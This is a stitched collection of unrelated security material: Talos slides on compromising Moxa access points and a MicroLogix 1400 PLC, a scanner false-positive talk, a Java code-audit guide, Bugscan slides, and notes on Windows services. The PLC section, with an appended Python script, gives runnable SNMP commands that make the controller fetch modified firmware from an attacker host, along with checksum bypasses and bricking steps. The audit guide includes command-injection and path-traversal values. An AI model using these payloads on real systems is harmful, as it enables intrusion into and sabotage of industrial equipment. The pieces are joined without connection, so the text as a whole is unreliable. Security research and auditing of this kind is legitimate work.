•  Modify legit binaries –  change the serviceAgent binary to deliver custom payloads to the Moxa Windows configuration application •  this potentially allows an attacker to “swim upstream”, moving from the device up to the IT network •  get around read-only: kill legit process and re-run new from /var –  “patch” the firmware install binary to skip integrity checks •  iptables, tunnels, catch all traffic, etc. •  Linux kernel modules –  insmod, lsmod, rmmod •  Change RF parameters –  frequency, channel, strength, etc. MOXA WAP: NOW WHAT? MOXA WAP: SOFT BRICK •  killall5 –  send a signal to all processes –  device requires manual hard power cycle •  reset button doesn’t work •  umount / mount games MOXA WAP: FIRM BRICK •  Not sure how it happened J •  Was testing out a bunch of Moxa binaries –  suspect it was fw_setenv followed by a couple mount/umount and a reboot •  the device never came back from the reboot –  have full console logs but haven’t been able to verify •  so far unable to un-brick the device •  only have 1 functional device remaining MOXA WAP: FIRM BRICK /&#&fw_setenv&-a& Unlocking&flash...& Done& Erasing&old&environment...& Done& Writing&environment&to&/dev/mtd1...& Done& Locking&...& Done& /&#&mount&-o&remount,rw&–a& /&#&reboot& & MOXA WAP: FIRM BRICK MOXA AWK-3131A: CVEs 1.  CVE-2016-8717 10.0 Hard-coded Administrator Credentials Vulnerability 2.  CVE-2016-8721 9.1 Web Application Ping Command Injection Vulnerability 3.  CVE-2016-8723 7.5 HTTP GET Denial of Service Vulnerability 4.  CVE-2016-8716 7.5 Web Application Cleartext Transmission of Password Vulnerability 5.  CVE-2016-8718 7.5 Web Application Cross-Site Request Forgery Vulnerability 6.  CVE-2016-8719 7.5 Web Application Multiple Reflected Cross-Site Scripting Vulnerabilities 7.  CVE-2016-8712 5.9 Web Application Nonce Reuse Vulnerability 8.  CVE-2016-8722 5.3 Web Application asqc.asp Information Disclosure Vulnerability 9.  CVE-2016-8720 3.1 Web Application bkpath HTTP Header Injection Vulnerability 10.  CVE-2016-0241 7.5 Web Application onekey Information Disclosure Vulnerability 11.  CVE-2016-8725 5.3 Web Application systemlog.log Information Disclosure Vulnerability 12.  CVE-2016-8724 5.3 serviceAgent Information Disclosure Vulnerability 13.  CVE-2016-8726 7.5 web_runScript Header Manipulation Denial of Service Vulnerability MOXA AWK-3131A: HELLO AB MICROLOGIX 1400 PLC ML1400: ABOUT •  Programmable Logic Controller (PLC) –  “micro” and “nano” control systems •  as opposed to “small” or “large” control systems –  “conveyor automation, security systems, and building and parking lot lighting.” •  Built in –  Input / Output –  Ethernet –  Serial –  Expansion I/O ML1400: ABOUT ML1400: FIRMWARE •  binwalk not much help •  strings not much help •  limited analysis tools ML1400: FIRMWARE - STRINGS ML1400: FIRMWARE - BINWALK ML1400: FIRMWARE - BINWALK binwalk&–A&<firmware>& ML1400: FIRMWARE - BINWALK ML1400: HARDWARE ML1400: HARDWARE ML1400: SNMP ML1400: SNMP snmpwalk&-v&2c&-c&public&192.168.42.11& ML1400: SNMP BACKDOOR snmpwalk&-c&public&-v&2c&192.168.42.11&.1.3.6.1.4.1.95& ML1400: SNMP BACKDOOR CVE-2016-5645 AB Rockwell Automation MicroLogix 1400 Code Execution Vulnerability ML1400: SNMP BACKDOOR ML1400: MODIFY FIRMWARE ML1400: MODIFY FIRMWARE ML1400: MODIFY FIRMWARE & ~#&snmpset&-c&wheel&-v&2c&192.168.42.11&. 1.3.6.1.4.1.95.2.2.1.1.1.0&a&<attacker_IP>& & ~#&snmpset&-c&wheel&-v&2c&192.168.42.11&. 1.3.6.1.4.1.95.2.2.1.1.2.0&s&"<evil_firmware>”& & ~#&snmpset&-c&wheel&-v&2c&192.168.42.11&. 
1.3.6.1.4.1.95.2.3.1.1.1.1.0&i&2& ML1400: MODIFY FIRMWARE ML1400: MODIFY FIRMWARE ML1400: BYPASS INTEGRITY CHECK •  Only using self-reported checksum* –  Basic math –  At least two very easy bypasses 1.  Find all occurrences of checksums in the firmware and update to match modified firmware 2.  Make “compensating” changes when modifying firmware –  “zero sum” byte changes »  0x12&0x34&à&0x34&0x12& »  0x42&0x42&à&0x41&0x43& »  0x00&0x00&0x00&0xFF&à&0x41&0x42&0x43&0x39& •  * Rockwell claims that the newest hardware (Series C) uses cryptographically-signed firmware •  Not supported on older models •  Challenge accepted J ML1400: BYPASS INTEGRITY CHECK ML1400: BYPASS INTEGRITY CHECK ML1400: BYPASS INTEGRITY CHECK ML1400: MODIFY FIRMWARE ML1400: MODIFY FIRMWARE ML1400: MODIFY FIRMWARE •  web header ML1400: MODIFY FIRMWARE •  web change ML1400: MODIFY FIRMWARE ML1400: SOFT BRICK 4EF9&0004&0150& &JMP&0x00040150&& & JMP&to&start&of&code& &0x150&bytes&in& &offset&0x40000& ML1400: SOFT BRICK 4EF9&0004&0000& &JMP&0x00040000&& & JMP&to&self& ML1400: SOFT BRICK ML1400: SOFT BRICK Reboot (Try TFTP Firmware) (Try Flash Firmware) ML1400: SOFT BRICK ML1400: FIRM BRICK •  Unsuccessful with a few dozen “elegant” attacks –  creative changes of MIPS instructions –  jump loops –  math •  Success on first attempt of “hey, look over there” attack –  randomly move bytes* around *bytes that are important but are not MIPS instructions ML1400: FIRM BRICK ML1400: FIRM BRICK ML1400: FIRM BRICK ML1400: FIRM BRICK ML1400: FIRM BRICK ML1400: HARD BRICK ML1400: HARD BRICK CONCLUSION tl;dr •  From Box to Backdoor to Brick THANK YOU •  Cisco Talos •  Moxa Americas •  Rockwell Automation / Allen-Bradley QUESTIONS? Patrick DeSantis @pat_r10t talosintelligence.com @talossecurity BACKUP SLIDES IP CAMERA? VENDOR DISCLOSURE
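The snmpset sequence for CVE-2016-5645 shown earlier in this deck is hard to read after PDF extraction (spaces were mangled into "&"), so the sketch below restates the same three SNMP writes in runnable form. The OIDs and the "wheel" community string come straight from the slides; the attacker TFTP address and firmware file name are placeholders, and, as the bricking slides demonstrate, actually pushing a modified image is destructive.

import subprocess

TARGET = "192.168.42.11"              # PLC address used in the demo
ATTACKER_TFTP = "192.168.42.99"       # placeholder: host serving the image
EVIL_IMAGE = "modified_firmware.img"  # placeholder: name of the modified image

steps = [
    # 1. Point the controller at the attacker-controlled TFTP server.
    (".1.3.6.1.4.1.95.2.2.1.1.1.0", "a", ATTACKER_TFTP),
    # 2. Name the firmware file the controller should fetch.
    (".1.3.6.1.4.1.95.2.2.1.1.2.0", "s", EVIL_IMAGE),
    # 3. Trigger the update via the undocumented "wheel" community.
    (".1.3.6.1.4.1.95.2.3.1.1.1.1.0", "i", "2"),
]

for oid, asn_type, value in steps:
    subprocess.run(
        ["snmpset", "-c", "wheel", "-v", "2c", TARGET, oid, asn_type, value],
        check=True,
    )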
Hacking the EULA: Reverse Benchmarking Web Application Security Scanners Each year thousands of work hours are lost by security practitioners sorting through web application security reports separating out erroneous vulnerability data. Individuals must currently work through this process in a vacuum, as there is little to no publicly available information that is helpful. Compounding this situation, restrictive vendor EULAs (End User License Agreements) prohibit publishing of research about the quality of their signature base. Due to these agreements, a chilling effect has discouraged public research into the common types of false positives that existing commercial web application scanner technologies are prone to exhibit. Overview Tom Stracener, Sr. Security Analyst, Cenzic Inc. Marce Luck, Information Security Architect, Fortune 100 company About the speakers… Introduction Web Application Security Scanning Technology The Problem of False Positives What is Reverse Benchmarking? Reverse Benchmarking Methodology 10 Common False Positive Types Further Research Business as usual… B) You shall not: (i) use the Software or any portion thereof except as provided in this Agreement; (ii) modify, create derivative works of, translate, reverse engineer, decompile, disassemble (except to the extent applicable laws specifically prohibit such restriction) or attempt to derive the Source Code of the Software provided to You in machine executable object code form; (iii) market, distribute or otherwise transfer copies of the Software to others; (iv) rent, lease or loan the Software; (v) distribute externally or to any third party any communication that compares the features, functions or performance characteristics of the Software with any other product of You or any third party; or (vi) attempt to modify or tamper with the normal function of a license manager that regulates usage of the Software. What is Reverse Benchmarking? Proactive Security Whoever is first in the field and awaits the coming of the enemy, will be fresh for the fight; whoever is second in the field and has to hasten to battle will arrive exhausted. -- Sun-Tzu “The Art of War” Analyzing Application Security Scanners • Security Assessment ‘quality’ criteria – Functionality (Black vs White Box) – Ergonomics & Usability – Performance – Feature Sets – Bling – Accuracy – False Positive Rates i.e. Signal to Noise Analyzing Application Security Scanners • Benchmarking Concepts – Benchmarking black box scanners is ultimately a systematic comparison – Most common Benchmarking technique is ‘positive’ or ‘comparative’ benchmarking – The goal is to see which scanner does the best against a selected application Positive and Negative Accuracy concepts + Benchmarking: Accuracy Positive Benchmarking is a measure of the number of valid results relative to the total number of vulnerabilities in the application. • Example: Scanner Foodizzle found 8 out of 10 vulnerabilities in the target application, i.e. it was 80% relative to the vulnerability-set. • Use: Measures of ‘accuracy’ are commonly used during positive benchmarking, bake-offs, etc. • Challenges: Accuracy is difficult to measure because its often difficult to know exactly how many vulnerabilities there are in the target application. 
+ Benchmarking Limitations Positive Benchmarking relies on objective knowledge of vulnerabilities in the target application, and thus breaks down when not performed by experts • Selection Bias: Scanner Foodizzle found 8 out of 10 vulnerabilities in the target application, i.e. it was 80% relative to the vulnerability-set. • Interpreting the Data: Measures of ‘accuracy’ are commonly used during positive benchmarking, bake-offs, etc. • Tuning Against the App: Accuracy is difficult to measure because its often difficult to know exactly how many vulnerabilities there are in the target application. • Analysis Gaps: typical bake-off or benchmarking methods do not rigorously test important scanner characteristics like the spider, because the spider is only indirectly related to accuracy + Benchmarking Limitations Positive Benchmarking relies on objective knowledge of vulnerabilities in the target application, and thus breaks down when not performed by experts • Tuning Against the App: Its not uncommon for vendors to download the well-known sample applications and ‘tune’ their technology to detect most or all of the security issues. Reverse Benchmarking enlarges the eye of the EULA needle… What is Reverse Benchmarking? • It’s a type of passive Reverse Engineering. • Its Designed to Kick a Scanner’s AssTM • Causes Massive False Positives • Facilitates an understanding vulnerability detection methods • Think of it as Detection Logic Fuzzing Exposes poor coding, faulty detection logic Reveals Security Testing design flaws Confuses Stateless Testing Mechanisms Rationale for Reverse Benchmarking Most of the Common False Positive Types have been around since 1999-2000 Most testing mechanisms are entirely stateless and have evolved little Very little is known about False Positives, as a science There are no taxonomies or Top 10 lists for Common False Positive Types Reverse Benchmark Target Web Application Scanner Enumerates and Categorizes False Positive Types Reveals Vacuous or Meaningless results Reveals Semantic flaws in vulnerability Categorization Reveals systemic flaws in application spider technology Web Application Security Scanners Key Trends 2000-2007 GUI’s have gotten prettier but the underlying technology hasn’t changed much since 2000. Many technologies are still using stateless stimulus-response mechanisms for most security tests (XSS is becoming the exception to this rule). False Positives related to the detection of SQL injection and Blind SQL Injection are rampant. Mechanics of file scanning is still largely based on Whisker-Nikto, and prone to false positives AJAX and Web Services support has increased the numbers of false positives, due to re-use of legacy security testing procedures. Signal-to-Noise Ratio is still very bad, with False Positives exceeding useful results usually by 2:1, and this is a conservative figure. Most application spiders do poorly against javascript and flash, and some technologies cannot automatically navigate Form-based logins. Semantic problems with security tests are widespread, i.e. mislabeled vulnerabilities, ambiguous vulnerabilities, meaningless results. Each year the problem gets worse, and acquisitions may further set back innovation. 
The Problem of False Positives (A scanner darkly) Common False Positive Types are not Easily Studied… B) You shall not: (i) use the Software or any portion thereof except as provided in this Agreement; (ii) modify, create derivative works of, translate, reverse engineer, decompile, disassemble (except to the extent applicable laws specifically prohibit such restriction) or attempt to derive the Source Code of the Software provided to You in machine executable object code form; (iii) market, distribute or otherwise transfer copies of the Software to others; (iv) rent, lease or loan the Software; (v) distribute externally or to any third party any communication that compares the features, functions or performance characteristics of the Software with any other product of You or any third party; or (vi) attempt to modify or tamper with the normal function of a license manager that regulates usage of the Software. Most EULAs prevent a comparison between technologies Reverse Benchmarking Methodology Active False Positive Solicitation and Reverse Fault Injection via a sample web application. A reverse benchmarking target can be used to model a production application, thereby decreasing the semantic gap between triggered false positives and false positives found within the production environment Reverse Benchmarking Goals The goal of Reverse Benchmarking is not to malign vendors, but to aid the security community and help developers avoid the same mistakes with each new generation of technology Systematically performed, Reverse Benchmarking can help security practioners learn to quickly distinguish false positives from valid security issues, as they will learn the conditions under which the technology they are using fails. Based on the type of trigger that elicits the false positive, a taxonomy of false positive types can be developed. A set of common causes or contributing factors for each type can be outlined. Partial Match Problems Detection strings may be a subset of existing content and triggered by the presence of unrelated words or elements within the HTML or DOM GET /search.pl~bak July 2007 200 OK Common Causes of False Positives Parameter Echoing Parameter values may be echoed back in places within a web application, and this can trigger false positives. <TEXTAREA rows=3 ls=100> • <?php • // get the form data • $field1 = $_POST['comments']; • // Echo the value of the comments parameter • echo "Backacha Biatch: $field1"; • ?> • </TEXTAREA> Mistaken Identity Some security tests look for vulnerability conditions so general that the vulnerability reported must be disambiguated in order to be verified. Many types of PHP forum software, Calendars, Blogs reuse a common code base and so overlapping URI and application responses GET /search.pl Alibaba Search Overflow Paul’s Search SQL InjXn YABB Search.pl XSS Semantic Ambiguity Signature-based detection is often relies on signatures that are generic and thus are neither necessary nor sufficient for the vulnerability to be present. [Microsoft][ODBC SQL Server Driver] Many false positives arise because the vulnerability is more complex than the vulnerability conditions checked for by the signatures. Response Timing Slow, unresponsive, or delayed server-side processing can trigger security checks that are timing dependent Some SQL injection tests use a wait_for_delay expression and measure the timing. Custom 404 Pages Simple file scanning routines and other security tests will trigger erroneously in the presence of custom 404 pages. 
Some signatures are based on 302 Redirects GET /search.pl~bak 302 200 Custom 404 Pages Simple file scanning routines and other security tests will trigger erroneously in the presence of custom 404 pages. Some signatures are based on 302 Redirects GET /search.pl~bak 302 200 Creating a Reverse Benchmark target Nature of the target will depend on your goals as a researcher Reverse Engineering 1. Emphasis on exposing as much of the signature base and rule set as possible without inspecting datafiles or code. Clear generic cases that will likely impact the largest portion of the rule base 2. Focus on generic trigger signatures, including available open source scanners. (i.e. use of Nikto detections strings in response data. Creating a Reverse Benchmark target Nature of the target will depend on your goals as a researcher Bakeoffs/Comparisons 1. Emphasis on exposing false positives or signature flaws of all varieties, including the uncommon or essoteric. Use of non- standard or overly difficult application configuration to stress test the scanner. 2. Focus on unusual or non-standard trigger signatures. i.e. Javascript or Flash road test Creating a Reverse Benchmark target Nature of the target will depend on your goals as a researcher Reverse Engineering 1. Emphasis on exposing as much of the signature base and rule set as possible without inspecting datafiles or code. 2. Focus on generic trigger signatures Open Reverse Benchmarking Project Nature of the target will depend on your goals as a researcher 1. Emphasis on exposing as much of the signature base and rule set as possible without inspecting datafiles or code. 2. Focus on generic trigger signatures Backatcha Roadtest Results Took 4 popular blackbox web application security scanners Ran their default policies against the target reverse benchmarking application Put the results into high level buckets Generated a few graphs with the results Total False Positives 92% 2% 2% 4% Scanner 1 Scanner 2 Scanner 3 Scanner 4 Scanner 1 False Positives 42% 5% 2% 7% 30% 14% 0% Path Manipulation Command Injection XSS SQL Injection File Disclosure Known Vulnerabilities Misconfigurations Scanner 2 False Positives 29% 11% 4% 21% 21% 0% 14% Path Manipulation Command Injection XSS SQL Injection File Disclosure Known Vulnerabilities Misconfigurations Scanner 3 False Positives 0% 29% 67% 2% 1% 0% 1% Path Manipulation Command Injection XSS SQL Injection File Disclosure Known Vulnerabilities Misconfigurations Scanner 4 False Positives 4% 0% 53% 0% 7% 0% 36% Path Manipulation Command Injection XSS SQL Injection File Disclosure Known Vulnerabilities Misconfigurations Conclusions All Scanners had simple problems One scanner did really badly Further Research is needed Community support is needed Examples of false positives Further Research Improve reverse benchmarking target Add more tests Improve testing methodology Test with more scanners Partner with OWASP Help develop Reverse Benchmarking Module for SiteGenerator
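A reverse-benchmark target only has to hand a scanner the triggers it is hunting for. The sketch below is an illustrative Flask stand-in, not the original Backatcha code, that deliberately exhibits three of the false-positive classes catalogued above: every path answers 200 like a custom 404 page, every response carries a generic ODBC error-string signature, and a request parameter is echoed back like an XSS sink.

from flask import Flask, request

app = Flask(__name__)

@app.route("/", defaults={"path": ""})
@app.route("/<path:path>")
def trap(path):
    # Custom "404": every path answers 200, tripping file-scanning checks
    # that trust the status code (GET /search.pl~bak -> 200 OK).
    echoed = request.args.get("comments", "")
    body = (
        "<html><body>"
        # Generic error-string signature, enough for many naive SQLi checks.
        "<!-- [Microsoft][ODBC SQL Server Driver] -->"
        # Parameter echoing: reflected input that looks like an XSS sink.
        f"<textarea rows='3'>Backatcha: {echoed}</textarea>"
        "</body></html>"
    )
    return body, 200

if __name__ == "__main__":
    app.run(port=8080)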
Java Code Audit: A Summary of Common Vulnerabilities

1.1 Summary of audit methodology
The two main code-audit methods are tracing user input data and backtracking from the parameters of sensitive functions.
Tracing user input means following the user's data and judging whether each piece of code logic it enters offers an exploitable point; that piece of logic may be a function or just a small conditional statement.
Sensitive-function parameter backtracking means starting from a sensitive function and tracing the parameter-passing chain in reverse. This is the most efficient and most commonly used method. Most vulnerabilities come from improper use of functions, so finding those functions lets you dig out the vulnerabilities you are after quickly.
The following is a summary of keyword-based audit techniques. When searching, pay attention to the whole-word and case-sensitivity settings.

Vulnerability type and search keywords:
- Hard-coded passwords, plaintext password storage: password, pass, jdbc
- XSS: getParameter, <%=, param.
- SQL injection: select, Dao, from, delete, update, insert
- Arbitrary file download: download, fileName, filePath, write, getFile, getWriter
- Arbitrary file deletion: delete, deleteFile, fileName, filePath
- File upload: upload, write, fileName, filePath
- Command injection: getRuntime, exec, cmd, shell
- Buffer overflow: strcpy, strcat, scanf, memcpy, memmove, memccpy, getc(), fgetc(), getchar, read, printf
- XML injection: DocumentBuilder, XMLStreamReader, SAXBuilder, SAXParser, SAXReader, XMLReader, SAXSource, TransformerFactory, SAXTransformerFactory, SchemaFactory
- Deserialization: ObjectInputStream.readObject, ObjectInputStream.readUnshared, XMLDecoder.readObject, Yaml.load, XStream.fromXML, ObjectMapper.readValue, JSON.parseObject
- URL redirect: sendRedirect, setHeader, forward
- Insecure component exposure: activity, Broadcast Receiver, Content Provider, Service, intent-filter
- Sensitive information in logs: log, log.info, logger.info
- Code execution: eval, system, exec

2.1 Vulnerabilities that can be audited by keyword

2.1.1 Hard-coded passwords
Audit method: hard-coded passwords are the easiest to find. Open the project directory in Sublime Text and press Ctrl + Shift + F to search globally for the keyword "password".

2.1.2 Reflected XSS
Audit method: Fortify usually picks up reflected XSS. To find it manually, search globally for the keywords getParameter, <%=, param.
Vulnerability code examples (screenshots in the original):
1. An EL expression outputting a request parameter: at lines 170 and 305 the code reads groupId from the request parameters and, without checking the value, writes it into JavaScript code, giving reflected XSS.
2. Output of a parameter obtained through getParameter, which is then printed at line 224 into the JavaScript shown in the original screenshot.

2.1.3 Stored XSS
Audit method: there are two main approaches:
1. Search globally for database insert statements (keywords: insert, save, update), find the method that contains the statement (for example insertUser()), search globally for where that method is called, and trace upward layer by layer until you reach the getParameter() call that reads the request parameter. If there is no global XSS filter and nothing along the way sanitizes the parameter, stored XSS exists.
2. Start from the getParameter keyword and follow the request parameter forward to the database insert statement; if nothing in between filters it, stored XSS exists.
In the example code, lines 45 and 46 read the usertype and name values and line 56 writes them to the database; because the incoming parameters are not filtered, the XSS fires when the data is displayed.

2.1.4 SQL injection
Audit method: Fortify usually detects SQL injection as well. When hunting manually, searching for select, update, delete, insert tends to pay off. If the SQL statement contains +, append, $() or # and no SQL filtering configuration is present, treat it as SQL injection.
When a particular variable is found to be injectable, you can also search globally for that variable to find files with similar flaws; in the example above, search globally for the tableName keyword.
To find which page reaches the vulnerable code, trace the method call stack. Taking the tableName injection point as an example: open the file, look at the function the variable lives in, and you find the function maps to the URL /lookOverCubeFile, whose feature is viewing the files generated by a model task.

2.1.5 Arbitrary file download
Audit method: search globally for fileName, filePath, getFile, getWriter.
Vulnerability example: downloadFile() reads affixalName from the request parameters into the FileName variable, concatenates it into downPath at line 196, and calls download(downPath) at line 198. The download() function writes the file at filePath into the HTTP response. Nothing in the flow validates the file name, so arbitrary file download exists; setting affixalName to ../../../WEB-INF/web.xml, for instance, downloads the site's web.xml.

2.1.6 Arbitrary file deletion
Audit method: search for delete, deleteFile, fileName, filePath.
Vulnerability example: the code reads fileName at line 41 and calls ds.deleteFile() at line 44 to delete the file. Nothing checks the file name, so arbitrary file deletion exists; setting fileName to ../WEB-INF/web.xml deletes the site's web.xml.

2.1.7 File upload
Audit method: search for upload, write, fileName, filePath (and note whether an upload whitelist is configured). The key questions are whether the file extension is checked and whether the configuration defines a whitelist or blacklist. The first example (a screenshot in the original) does check; the following one does not:

List<FileItem> fileItems = servletFileUpload.parseRequest(request);
for (int i = 0; i < fileItems.size(); ++i) {
    FileItem fi = (FileItem) fileItems.get(i);
    String strFileName = fi.getName();
    if (strFileName != null && !"".endsWith(strFileName)) {
        String fileName = opId + "_" + getTimeSequence() + "." + getFileNameExtension(strFileName);
        String diskFileName = path + fileName;
        File file = new File(diskFileName);
        if (file.exists()) {
            file.delete();
        }
        fi.write(new File(diskFileName));
        resultArrayNode.add(fileName);
        ......

private String getFileNameExtension(String fullFileName) {
    if (fullFileName == null) {
        return null;
    }
    int pos = fullFileName.lastIndexOf(".");
    if (pos != -1) {
        return fullFileName.substring(pos + 1, fullFileName.length());
    } else {
        return null;
    }
}

2.1.8 Command injection
Audit method: search for getRuntime, exec, cmd, shell.
At line 205 the command is built by concatenating the incoming ip value. If ip comes from outside, the following value runs the net user command: 127.0.0.1&&net user

2.1.9 Buffer overflow
Audit method: locate candidates by keyword and then analyze the context. Keywords: strcpy, strcat, scanf, memcpy, memmove, memccpy, getc(), fgetc(), getchar, read, printf.
Vulnerability example: in \kt\frame\public\tool\socket_repeater\mysocket.h at line 177 the hostname parameter is copied into m_hostname. m_hostname has size MAXNAME, which turns out to be 255; if the input is longer than 255, the buffer overflows.

2.1.10 XML injection
Audit method: XML parsing typically appears in configuration import, data-exchange interfaces and similar scenarios. Locate it with the keywords DocumentBuilder, XMLStreamReader, SAXBuilder, SAXParser, SAXReader, XMLReader, SAXSource, TransformerFactory, SAXTransformerFactory, SchemaFactory. Wherever XML files are processed, check whether the parser disables external entities to decide whether XXE is present.
Vulnerability example: at line 6 the code obtains a DOM parser and parses the XML input stream into a Document; if DTDs are not disabled, XXE exists. The code shown after it in the original is the XXE defense code.

2.1.11 Sensitive information in logs
Audit method: locate with the keywords log.info and logger.info. In SFtpOperate.java, line 134 writes the username and password straight into the log.

2.1.12 URL redirect
Audit method: locate with sendRedirect, setHeader, forward, and note whether a redirect whitelist is configured.
Vulnerability example: at line 40 the code only checks whether site is empty and never checks whether the URL belongs to the site itself, giving an open redirect.

2.1.13 Sensitive information disclosure and error handling
Audit method: check whether the configuration defines a unified error page; if it does, this issue does not apply. Otherwise locate candidates with the keywords getMessage and exception.
Vulnerability code example: in the file shown, line 89 prints the detailed exception information when the program fails.

2.1.14 Deserialization
Audit method: Java programs use ObjectInputStream.readObject to turn serialized data back into Java objects. When the serialized input is user-controlled, an attacker can craft malicious input so that deserialization produces unexpected objects and arbitrary code runs along the way. Deserialization usually appears in template import, network communication, data transfer, formatted log storage, and persisting objects to disk or a database. During an audit, focus on the deserialization functions and whether their input is controllable:
ObjectInputStream.readObject, ObjectInputStream.readUnshared, XMLDecoder.readObject, Yaml.load, XStream.fromXML, ObjectMapper.readValue, JSON.parseObject
Vulnerability example: in the code shown, the program reads an input stream and deserializes it into an object. Check whether the project pulls in exploitable third-party libraries such as commons-collections 3.1 or commons-fileupload 1.3.1; if so, a crafted serialized object yields arbitrary code execution.

2.1.15 Insecure component exposure
Audit method: review AndroidManifest.xml and check whether components that declare an <intent-filter> also set exported to false. In the AndroidManifest.xml shown, line 24 adds an <intent-filter> to an activity without setting it to false, so the component is exported by default.

3.1 Audit methods for other vulnerabilities

3.1.1 CSRF
Audit method: check whether a global CSRF filter is configured; if not, focus on whether each operation is protected by a token.
In Smpkpiappealcontroller.java at line 200, the delete operation is driven directly by ids without any anti-CSRF random-token check, so CSRF exists. Java/main/com/venustech/tsoc/cupid/smp/kpi/dao/smpkpideclardao.java line 517 performs the delete on the incoming ids.

3.1.2 Struts2 remote code execution
Audit method: check whether the Struts plugin version is a vulnerable one. Vulnerable versions can be looked up at https://www.exploit-db.com/

3.1.3 Unauthorized operations (broken access control)
Audit method: focus on whether each user-triggered operation verifies the current logged-in user's permissions. Some vendors use mainstream permission frameworks such as Shiro or Spring Security; in that case concentrate on the framework's configuration files and implementations.
Vulnerability example: the file shown uses Shiro for access control. Lines 58-72 set the path access rules and lines 51-55 restrict access under the admin path; only SysUserFilter implements isAccessAllowed, the other filters do not. In SysUserFilter's isAccessAllowed, lines 90-93 never check whether the resource belongs to the current user, which leads to unauthorized access. The other filter files only implement onAccessDenied().
If no framework is used, check whether every operation enforces authorization. In the example, line 7 reads username from the session and only checks that it is not empty; if the request is intercepted and username is replaced, an unauthorized operation becomes possible. Take the annual service-fee preparation feature as an example and test it, as shown in the original screenshot.

3.1.4 Session timeout
Audit method: Java web applications usually set the session timeout in one of two ways: in the web.xml configuration file, or in Java code.

3.1.5 Weak encryption of sensitive data
Audit method: look at how data in transit is protected, usually in util classes. The file shown uses a Base64 encoding method.

4.1 Tool usage

1. Fortify
1.1 New scan
1.1.1 Custom scan directories from the command line:
If you want to control which directories Fortify scans, the following command is convenient:
sourceanalyzer -scan -cp "lib/*.jar" "src/**/*.java" "web/**/*.jsp" -f result.fpr
-cp sets the class library path; omit it if there are no libraries.
"src/**/*.java" "web/**/*.jsp" tell it to scan all java files under src and all jsp files under web.
-f sets the output file to result.fpr; when the scan finishes, double-click the file to open it in Fortify.
1.1.2 Graphical interface
1.2 Viewing results
Issue list; issue description: Details; remediation advice: Recommendations; taint-trace diagram: Diagram.

2. Sublime Text
2.1 Open the corresponding project directory.
2.2 Global search: Ctrl + Shift + F. The icons in the search bar toggle case sensitivity and whole-word matching.

3. JD-GUI
When there is no source code and you need to analyze jar packages or class files, use JD-GUI. Drag a jar or class file into jd-gui to open it, then search for keywords to audit (tick all the search options).

4. File Explorer
The file explorer built into Windows makes it easy to search for a particular file or for java and jsp files. In practice, combining Fortify, Sublime Text and the file explorer is the most efficient approach.
pdf
Bugscan

01 Development history  02 Community members  03 Framework improvements

Development history
Born in 2011; officially released in February 2015 after four years and five rewrites.
The community ("circle") launched in May 2015; a Bugscan salon was held in August 2015.
The community has grown to more than 5,000 members, and the number of plugins has grown from 90 to more than 600.
It can currently fingerprint more than 20 kinds of system services and crack weak passwords, and can identify and scan for vulnerabilities in more than 80 mainstream web applications and network devices.
More than 1,000,000 targets have been scanned so far, producing over 6,000,000 vulnerability records.

Community members
Core members of the community:
- all kinds of general-purpose plugins, the largest in number and the highest in quality
- rapid tracking of trending vulnerabilities; discovered a denial-of-service vulnerability in Xx狗
- vulnerabilities in various system services and protocols
- plugin review, community store
- plugin review, plugin-writing tutorials
Zero, 星光点亮◇天, range, Medici.Yan, 不流畅, LinE

Framework improvements: curl
Improvements to curl.

Framework improvements: filter plugins
Improvements to filter plugins. (Diagram: crawler plugin and active plugins call curl against the target; responses flow through the filter plugin, which can produce new targets.)
1. For example, when an injection-detection plugin triggers an error response, the filter plugin can capture it.
2. For example, when another plugin calls curl, the filter plugin can discover new forms.

Framework improvements: logging
Improvements to logging cover server-node communication, the crawler's URL tree, plugin assignment (assign), plugin verification (audit), plugin calls to curl, plugin calls to debug, task distribution, and framework/plugin exception logs.
This makes it possible to quickly pin down false positives and false negatives, locate complex compound bugs, and find time-consuming plugins so they can be improved.

Framework improvements: priority during task distribution
The crawler plugin pushes a large number of www tasks, so the ordinary task queue needs to become a priority queue (see the sketch below): CMS identification, CMS-type plugins, system plugins and other important plugins are given a higher priority level.

THANKS FOR YOUR WATCHING
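The priority-queue change mentioned above is easy to picture with a small, generic sketch (my own illustration, not Bugscan's real plugin API; the class and task names are made up). Tasks with a lower priority number are dispatched first, so identification and system-service plugins jump ahead of the bulk crawler tasks.

```python
import heapq
import itertools

class TaskQueue:
    """Minimal priority task queue: lower priority number = dispatched first."""
    def __init__(self):
        self._heap = []
        self._counter = itertools.count()  # tie-breaker keeps FIFO order within one priority

    def push(self, priority, task):
        heapq.heappush(self._heap, (priority, next(self._counter), task))

    def pop(self):
        return heapq.heappop(self._heap)[2]

q = TaskQueue()
q.push(5, "generic www crawl task")
q.push(1, "cms identification plugin")   # important plugins get a smaller number
q.push(2, "system service plugin")
print(q.pop())  # -> "cms identification plugin"
```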
pdf
Windows Security - Services (Part 1)

0x00 Preface
The scope of Windows security really is huge, and I am only a traveler on the road of learning it. I am writing things down as I learn, and hope there are fellow travelers along the way. My plan is to start from Windows services: first study the basic mechanisms of Windows services, then the related security issues, and record my thoughts and any follow-up research along the way. Naturally, a large part of this knowledge comes from publicly available material on the Internet and from "Windows Internals, 7th edition" (Parts 1 and 2).

Simplified diagram of the Windows service architecture:
Judging from the diagram, the core components of Windows services are not complicated. Users normally control service applications through SCP-type programs such as sc.exe, but the control is not direct: it goes through the SCM, which controls the service application on the SCP's behalf.

0x02 Basic components
From the diagram above we know there are three core components: the service application, the service control program (SCP), and the service control manager (SCM). Let us look at each of them.

1. Service application
A service application is easy to understand: it is the executable program we develop. Unlike an ordinary executable, a service executable contains extra code that receives commands sent by the SCM and reports the service's current status back to the SCM. A service executable usually has no user interface and is a console program. Speaking of which, anyone who has used Cobalt Strike will have noticed that when generating an implant, CS offers two kinds of Windows executables, one of which is the Service executable, intended specifically for creating services. In other words, the executable you supply when creating a service is different from an ordinary one: an ordinary program has no code for talking to the SCM, so the service will fail to start. You can, however, use cmd.exe /c "xxx.exe" to run a non-service executable: when the service starts, cmd.exe cannot communicate with the SCM and its process is terminated, but its child process xxx.exe is not terminated and keeps running. Note that xxx.exe must not be a program with a user interface such as calc.exe; it needs to be a console program. Why is that? It is related to session isolation, which will be discussed later.
A service application runs inside a service process, and one service process can host multiple service applications, so service processes are divided into own-process and shared-process types.

2. Service control program (SCP)
